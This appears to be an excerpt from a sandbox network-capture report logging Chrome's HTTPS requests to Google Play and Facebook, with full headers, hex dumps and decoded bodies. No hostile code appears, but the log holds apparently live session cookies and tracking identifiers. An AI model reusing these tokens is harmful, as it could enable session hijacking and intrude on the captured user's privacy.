                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 53 56 48 5a 77 52 6d 5a 32 54 7a 64 6e 52 7a 52 46 5a 44 4a 72 65 58 52 56 55 6c 68 78 57 6d 4d 33 61 56 52 50 53 45 5a 30 53 7a 64 44 5a 57 45 30 55 32 64 6b 56 55 4e 4e 59 6b 5a 52 4d 44 42 45 5a 31 51 30 62 6b 6c 4b 65 6a 64 74 53 48 68 52 5a 6b 46 44 59 57 77 76 4d 46 59 76 64 58 6c 56 4d 56 59 30 52 6d 52 58 4d 32 78 51 59 6a 4e 55 64 6d 31 43 5a 6b 73 30 62 55 45 33 4e 44 68 76 59 54 41 79 55 6b 77 30 4f 55 46 50 53 32 78 46 4c 7a 64 30 64 6a 64 5a 56 6b 39 76 62 30 74 46 52 48 4e 48 62 6a 67 31 64 6a 42 42 53 6d 68 31 4b 33 4a 74 54 6d 63 78 4e 6d 34 79 4d 55 6f 34 55 32 46 51 4d 54 5a 32 4b 32 39 72 54 54 56 55 62 48 5a 74 63 31 52 43 62 6a 4a 79 55 44 68 58 4d 55 74 55 5a 69 38 79 51 32 64 47 52 47 78 4f 62 6e 46 44 61 32 30 35 61 45 51 30 61 44
                                                                                                                                                                                                                                  Data Ascii: SVHZwRmZ2TzdnRzRFZDJreXRVUlhxWmM3aVRPSEZ0SzdDZWE0U2dkVUNNYkZRMDBEZ1Q0bklKejdtSHhRZkFDYWwvMFYvdXlVMVY0RmRXM2xQYjNUdm1CZks0bUE3NDhvYTAyUkw0OUFPS2xFLzd0djdZVk9vb0tFRHNHbjg1djBBSmh1K3JtTmcxNm4yMUo4U2FQMTZ2K29rTTVUbHZtc1RCbjJyUDhXMUtUZi8yQ2dGRGxObnFDa205aEQ0aD


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  143192.168.2.650037142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1555OUTPOST /_/PlayStoreUi/browserinfo?f.sid=-4709349331996553121&bl=boq_playuiserver_20240925.10_p0&hl=ru&gl=US&authuser&soc-app=121&soc-platform=1&soc-device=1&_reqid=3233&rt=j HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 118
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  X-Same-Domain: 1
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://play.google.com
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg; _ga=GA1.3.1369306439.1727585630; _gid=GA1.3.1233940498.1727585630; _gat_UA199959031=1; _gcl_au=1.1.303246603.1727585631
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC118OUTData Raw: 66 2e 72 65 71 3d 25 35 42 39 25 32 43 31 25 32 43 31 25 32 43 25 35 42 6e 75 6c 6c 25 32 43 31 30 32 34 25 32 43 31 32 38 30 25 35 44 25 32 43 25 35 42 6e 75 6c 6c 25 32 43 39 30 37 25 32 43 31 32 38 30 25 35 44 25 32 43 25 35 42 31 25 32 43 31 25 32 43 6e 75 6c 6c 25 32 43 31 25 35 44 25 32 43 25 35 42 30 25 32 43 30 25 32 43 30 25 35 44 25 35 44 26
                                                                                                                                                                                                                                  Data Ascii: f.req=%5B9%2C1%2C1%2C%5Bnull%2C1024%2C1280%5D%2C%5Bnull%2C907%2C1280%5D%2C%5B1%2C1%2Cnull%2C1%5D%2C%5B0%2C0%2C0%5D%5D&
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:53 GMT
                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/PlayStoreUi/cspreport
                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC97INData Raw: 35 62 0d 0a 29 5d 7d 27 0a 0a 5b 5b 5b 22 66 2e 6d 74 22 5d 2c 5b 22 64 69 22 2c 31 37 5d 2c 5b 22 61 66 2e 68 74 74 70 72 6d 22 2c 31 36 2c 22 33 36 36 32 32 32 37 36 35 37 30 32 31 37 36 35 32 37 31 22 2c 38 38 5d 2c 5b 22 65 22 2c 34 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 39 31 5d 5d 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 5b)]}'[[["f.mt"],["di",17],["af.httprm",16,"3662227657021765271",88],["e",4,null,null,91]]]
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  144192.168.2.650040142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1607OUTPOST /_/PlayStoreUi/data/batchexecute?rpcids=teXCtc&source-path=%2Fstore%2Fsearch&f.sid=-4709349331996553121&bl=boq_playuiserver_20240925.10_p0&hl=ru&gl=US&authuser&soc-app=121&soc-platform=1&soc-device=1&_reqid=103233&rt=c HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 138
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  X-Same-Domain: 1
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://play.google.com
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg; _ga=GA1.3.1369306439.1727585630; _gid=GA1.3.1233940498.1727585630; _gat_UA199959031=1; _gcl_au=1.1.303246603.1727585631
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC138OUTData Raw: 66 2e 72 65 71 3d 25 35 42 25 35 42 25 35 42 25 32 32 74 65 58 43 74 63 25 32 32 25 32 43 25 32 32 25 35 42 6e 75 6c 6c 25 32 43 25 35 42 25 35 43 25 32 32 69 6e 73 74 61 67 72 61 6d 25 35 43 25 32 32 25 35 44 25 32 43 25 35 42 31 30 25 35 44 25 32 43 25 35 42 32 25 32 43 31 25 35 44 25 32 43 34 25 35 44 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 25 32 32 67 65 6e 65 72 69 63 25 32 32 25 35 44 25 35 44 25 35 44 26
                                                                                                                                                                                                                                  Data Ascii: f.req=%5B%5B%5B%22teXCtc%22%2C%22%5Bnull%2C%5B%5C%22instagram%5C%22%5D%2C%5B10%5D%2C%5B2%2C1%5D%2C4%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:53 GMT
                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/PlayStoreUi/cspreport
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC148INData Raw: 33 61 33 0d 0a 29 5d 7d 27 0a 0a 39 32 32 0a 5b 5b 22 77 72 62 2e 66 72 22 2c 22 74 65 58 43 74 63 22 2c 22 5b 5b 5b 5c 22 69 6e 73 74 61 67 72 61 6d 5c 22 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 2f 73 74 6f 72 65 2f 73 65 61 72 63 68 3f 71 5c 5c 75 30 30 33 64 69 6e 73 74 61 67 72 61 6d 5c 5c 75 30 30 32 36 63 5c 5c 75 30 30 33 64 61 70 70 73 5c 22 5d 5d 2c 6e
                                                                                                                                                                                                                                  Data Ascii: 3a3)]}'922[["wrb.fr","teXCtc","[[[\"instagram\",null,[null,null,null,null,[null,null,\"/store/search?q\\u003dinstagram\\u0026c\\u003dapps\"]],n
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC790INData Raw: 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5c 22 43 43 4f 36 41 67 51 49 41 52 41 41 5c 22 5d 5d 2c 5b 5c 22 69 6e 73 74 61 67 72 61 6d 20 6c 69 74 65 5c 22 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 2f 73 74 6f 72 65 2f 73 65 61 72 63 68 3f 71 5c 5c 75 30 30 33 64 69 6e 73 74 61 67 72 61 6d 2b 6c 69 74 65 5c 5c 75 30 30 32 36 63 5c 5c 75 30 30 33 64 61 70 70 73 5c 22 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5c 22 43 43 4f 36 41 67 51 49 41 52 41 41 5c 22 5d 5d 2c 5b 5c 22 69 6e 73 74 61 67 72 61 6d 20 76 69 64 65 6f 20 73 6b 61 63 68 61 74 5c 22 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 2f 73 74 6f 72 65 2f 73 65
                                                                                                                                                                                                                                  Data Ascii: ull,null,[\"CCO6AgQIARAA\"]],[\"instagram lite\",null,[null,null,null,null,[null,null,\"/store/search?q\\u003dinstagram+lite\\u0026c\\u003dapps\"]],null,null,[\"CCO6AgQIARAA\"]],[\"instagram video skachat\",null,[null,null,null,null,[null,null,\"/store/se
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC33INData Raw: 31 62 0d 0a 32 35 0a 5b 5b 22 65 22 2c 34 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 39 35 38 5d 5d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 1b25[["e",4,null,null,958]]
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  145192.168.2.650046157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:54 UTC1196OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=6&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 919
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygmffsGP8wthEPtBm
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:54 UTC919OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 67 6d 66 66 73 47 50 38 77 74 68 45 50 74 42 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 33 33 30 37 32 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 67 6d 66 66 73 47 50 38 77 74 68 45 50 74 42 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 75 73 65 72 22 3a 22 30 22 2c 22 77 65 62 53 65 73 73 69 6f 6e 49 64 22 3a 22 38 6d 63 65 72 30 3a 65 61 74 37 6c 6a 3a 31 64 68 61 30 36 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31
                                                                                                                                                                                                                                  Data Ascii: ------WebKitFormBoundarygmffsGP8wthEPtBmContent-Disposition: form-data; name="ts"1727585633072------WebKitFormBoundarygmffsGP8wthEPtBmContent-Disposition: form-data; name="q"[{"user":"0","webSessionId":"8mcer0:eat7lj:1dha06","app_id":"256281
                                                                                                                                                                                                                                  2024-09-29 04:53:54 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923799733465448", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923799733465448"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:54 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:54 UTC1922INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  146192.168.2.650059157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC870OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=6&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:55 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923804777507927", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923804777507927"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
